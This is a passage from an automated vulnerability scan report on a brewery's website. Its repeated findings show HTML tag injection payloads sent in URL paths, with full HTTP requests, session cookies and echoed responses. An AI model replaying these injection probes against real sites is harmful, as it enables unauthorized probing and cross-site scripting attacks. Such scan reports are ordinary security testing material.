Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content751d3"><a>fcf7cbffa31_page" class="content751d3">
...[SNIP]...

1.91. http://www.ninkasibrewing.com/content/img/skin/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8616a"><a>5ae4af16787 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content8616a"><a>5ae4af16787/img/skin/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content8616a"><a>5ae4af16787_page" class="content8616a">
...[SNIP]...

1.92. http://www.ninkasibrewing.com/content/img/skin/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b3e"><a>f6c375e180b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content46b3e"><a>f6c375e180b/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content46b3e"><a>f6c375e180b_page" class="content46b3e">
...[SNIP]...

1.93. http://www.ninkasibrewing.com/content/img/skin/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e515"><a>56087270b4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5e515"><a>56087270b4d/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content5e515"><a>56087270b4d_page" class="content5e515">
...[SNIP]...

1.94. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7dc2"><a>a7f908ef1e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta7dc2"><a>a7f908ef1e0/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contenta7dc2"><a>a7f908ef1e0_page" class="contenta7dc2">
...[SNIP]...

1.95. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c044c"><a>596b9b87e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentc044c"><a>596b9b87e27/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentc044c"><a>596b9b87e27_page" class="contentc044c">
...[SNIP]...

1.96. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84dd"><a>998f8f781b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84dd"><a>998f8f781b2/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contenta84dd"><a>998f8f781b2_page" class="contenta84dd">
...[SNIP]...

1.97. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa20"><a>7c1fe0d07f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1aa20"><a>7c1fe0d07f2/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content1aa20"><a>7c1fe0d07f2_page" class="content1aa20">
...[SNIP]...

1.98. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aacc"><a>2d12b65e1f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content9aacc"><a>2d12b65e1f4/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content9aacc"><a>2d12b65e1f4_page" class="content9aacc">
...[SNIP]...

1.99. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff256"><a>504bb81dd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentff256"><a>504bb81dd8e/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentff256"><a>504bb81dd8e_page" class="contentff256">
...[SNIP]...

1.100. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accc7"><a>cc0bd9440f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentaccc7"><a>cc0bd9440f7/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentaccc7"><a>cc0bd9440f7_page" class="contentaccc7">
...[SNIP]...

1.101. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ea"><a>0538fc89295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content590ea"><a>0538fc89295/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content590ea"><a>0538fc89295_page" class="content590ea">
...[SNIP]...

1.102. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eb8"><a>507cafa61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content44eb8"><a>507cafa61ff/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content44eb8"><a>507cafa61ff_page" class="content44eb8">
...[SNIP]...

1.103. http://www.ninkasibrewing.com/content/js/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a306"><a>684cd006b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6a306"><a>684cd006b5e/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content6a306"><a>684cd006b5e_page" class="content6a306">
...[SNIP]...

1.104. http://www.ninkasibrewing.com/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a9"><a>41638d41753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content4c9a9"><a>41638d41753/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content4c9a9"><a>41638d41753_page" class="content4c9a9">
...[SNIP]...

1.105. http://www.ninkasibrewing.com/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab306"><a>4a7c751f450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentab306"><a>4a7c751f450/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentab306"><a>4a7c751f450_page" class="contentab306">
...[SNIP]...

1.106. http://www.ninkasibrewing.com/content/js/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d322"><a>02b1c89f5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1d322"><a>02b1c89f5f6/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content1d322"><a>02b1c89f5f6_page" class="content1d322">
...[SNIP]...

1.107. http://www.ninkasibrewing.com/content/js/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f630"><a>d1f857ac5af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5f630"><a>d1f857ac5af/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content5f630"><a>d1f857ac5af_page" class="content5f630">
...[SNIP]...

1.108. http://www.ninkasibrewing.com/content/js/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff1c"><a>27664a239f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentcff1c"><a>27664a239f7/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

